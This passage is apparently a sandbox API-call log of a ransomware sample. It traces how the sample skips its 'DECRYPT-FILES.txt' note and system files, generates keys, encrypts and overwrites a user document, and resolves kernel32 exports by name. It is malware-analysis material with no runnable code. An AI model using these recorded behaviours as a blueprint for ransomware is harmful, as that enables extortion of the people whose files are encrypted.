ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0083.831] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0083.831] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf01ddc20, ftCreationTime.dwHighDateTime=0x1d4ce19, ftLastAccessTime.dwLowDateTime=0xf00389c0, ftLastAccessTime.dwHighDateTime=0x1d4d1b0, ftLastWriteTime.dwLowDateTime=0xf00389c0, ftLastWriteTime.dwHighDateTime=0x1d4d1b0, nFileSizeHigh=0x0, nFileSizeLow=0x11938, dwReserved0=0x0, dwReserved1=0x0, cFileName="DZdoyBFOvdeUBph.odp", cAlternateFileName="DZDOYB~1.ODP")) returned 1 [0083.832] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp", lpString2="DECRYPT-FILES.txt") returned 1 [0083.832] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp", lpString2="autorun.inf") returned 1 [0083.832] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp", lpString2="boot.ini") returned 1 [0083.832] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp", lpString2="desktop.ini") returned 1 [0083.832] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp", lpString2="ntuser.dat") returned -1 [0083.832] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp", lpString2="iconcache.db") returned -1 [0083.832] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp", lpString2="bootsect.bak") returned 1 [0083.832] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp", lpString2="ntuser.dat.log") returned -1 [0083.832] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp", lpString2="thumbs.db") returned -1 [0083.832] lstrcmpiW (lpString1="DZdoyBFOvdeUBph.odp", lpString2="Bootfont.bin") returned 1 [0083.832] lstrlenW (lpString="DZdoyBFOvdeUBph.odp") returned 19 [0083.832] lstrcmpiW (lpString1="odp", lpString2="lnk") returned 1 [0083.832] lstrcmpiW (lpString1="odp", lpString2="exe") returned 1 [0083.832] lstrcmpiW (lpString1="odp", lpString2="sys") returned -1 [0083.832] lstrcmpiW (lpString1="odp", lpString2="dll") returned 1 [0083.832] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0083.832] lstrlenW (lpString="DZdoyBFOvdeUBph.odp") returned 19 [0083.832] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0083.832] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="DZdoyBFOvdeUBph.odp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\DZdoyBFOvdeUBph.odp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\DZdoyBFOvdeUBph.odp" [0083.832] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.832] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\DZdoyBFOvdeUBph.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\dzdoybfovdeubph.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0083.832] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=71992) returned 1 [0083.832] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0083.833] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.833] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.833] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.833] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.833] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0083.833] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0083.834] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.835] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.836] CloseHandle (hObject=0x42c) returned 1 [0083.836] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.836] WriteFile (in: hFile=0x428, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0083.836] CloseHandle (hObject=0x0) returned 0 [0083.837] CloseHandle (hObject=0x428) returned 1 [0083.837] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.837] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.837] GetTickCount () returned 0x114d6d0 [0083.837] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.837] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.837] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.838] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.838] lstrlenA (lpString="kernel32.dll") returned 12 [0083.838] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.838] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.838] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.838] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.838] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.838] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.838] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.838] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.838] lstrlenA (lpString="ADDATOMA") returned 8 [0083.838] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.838] lstrlenA (lpString="ADDATOMW") returned 8 [0083.838] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.838] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.838] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.838] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.838] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.838] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.838] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.838] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.839] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.839] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.839] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.839] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.839] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.839] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.839] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.839] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.839] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.839] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.839] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.839] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.839] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.839] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.839] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.839] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.839] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.839] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.839] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.840] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.840] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.840] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.840] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.840] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.840] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.840] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.840] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.840] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.840] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.840] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.840] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.840] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.840] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.840] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.840] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.840] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.840] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.840] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.840] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.841] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.841] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.841] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.841] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.841] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.841] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.841] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.841] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.841] lstrlenA (lpString="BEEP") returned 4 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.841] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.841] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.841] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.841] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.841] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.841] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.841] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.841] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.841] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.841] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.842] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.842] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.842] lstrlenA (lpString="CANCELIO") returned 8 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.842] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.842] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.842] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.842] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.842] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.842] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.842] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.842] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.842] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.842] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.842] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.842] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.842] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.842] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.842] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.842] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.842] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.843] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.843] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.843] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.843] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.843] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.843] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.843] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.843] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 